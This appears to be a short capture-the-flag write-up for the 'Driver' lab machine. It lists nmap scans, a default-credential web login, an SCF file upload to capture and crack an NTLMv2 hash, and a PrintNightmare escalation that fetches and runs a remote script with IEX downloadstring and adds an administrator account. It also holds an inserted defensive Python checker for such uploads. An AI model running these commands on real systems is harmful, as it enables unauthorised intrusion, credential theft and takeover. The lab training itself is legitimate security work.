nmap -A -p- -oA driver 10.129.246.138 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA driver 10.129.246.138

nmap -sU -O -p- -oA driver-udp 10.129.246.138

nikto -h 10.129.246.138:80


We browse to http://10.129.246.138

It asks for credentials:

admin:admin


https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/


On the web page we go to the Firmware Update Center and upload the file driver.scf

We click Submit.
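
The defender's side of the upload step above, as an added example that is not part of the original writeup: a Python check an upload handler could run to flag .scf/.url files whose IconFile points at a remote UNC path, which is what makes Explorer authenticate outward when the folder is browsed. The function names and the sample bytes are constructed for illustration.

```python
import re

# Shortcut-style text formats that Explorer parses when a folder is listed.
SHELL_EXTS = (".scf", ".url")
# A value starting with \\host\ or //host/ is fetched over the network.
UNC_RE = re.compile(r"^(\\\\|//)[^\\/\s]+[\\/]")

# Constructed samples (192.0.2.10 is a documentation address).
SAMPLE_REMOTE = b"[Shell]\r\nCommand=2\r\nIconFile=\\\\192.0.2.10\\share\\icon.ico\r\n"
SAMPLE_LOCAL = b"[Shell]\r\nCommand=2\r\nIconFile=C:\\Windows\\explorer.exe,3\r\n"

def decode(data: bytes) -> str:
    """These files are plain text; accept UTF-16 with a BOM as well as UTF-8."""
    if data[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return data.decode("utf-16", errors="replace")
    return data.decode("utf-8", errors="replace")

def find_remote_icon_refs(data: bytes) -> list:
    """Return (section, key, value) for every IconFile key set to a UNC path."""
    hits, section = [], ""
    for raw in decode(data).splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
        elif "=" in line and not line.startswith(";"):
            key, value = (part.strip() for part in line.split("=", 1))
            if key.lower() == "iconfile" and UNC_RE.match(value):
                hits.append((section, key, value))
    return hits

def inspect_upload(filename: str, data: bytes) -> list:
    """Reasons to quarantine an upload; an empty list means nothing was flagged."""
    reasons = []
    if filename.lower().endswith(SHELL_EXTS):
        reasons.append("shell-handled extension")
    # Content is checked regardless of the name, so it is flagged under any filename.
    for section, key, value in find_remote_icon_refs(data):
        reasons.append(f"[{section}] {key} -> remote path {value}")
    return reasons

if __name__ == "__main__":
    for name, blob in (("driver.scf", SAMPLE_REMOTE), ("notes.txt", SAMPLE_LOCAL)):
        print(name, inspect_upload(name, blob))
```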


john hash --wordlist=/usr/share/wordlists/rockyou.txt --format=netntlmv2

Credentials:

tony:liltony


evil-winrm -i 10.129.246.138 -u "Tony"


https://github.com/calebstewart/CVE-2021-1675

We git clone this repository.

And we see the file CVE-2021-1675.ps1

cd CVE-2021-1675

python3 -m http.server 80

IEX(New-Object Net.Webclient).downloadstring('http://10.10.14.49/CVE-2021-1675.ps1')


Invoke-Nightmare -NewUser "cu3rv0x" -NewPassword "SuperSecure"


evil-winrm -i 10.129.246.138 -u "cu3rv0x"


cat root.txt


copyright©2022 Cu3rv0x all rights reserved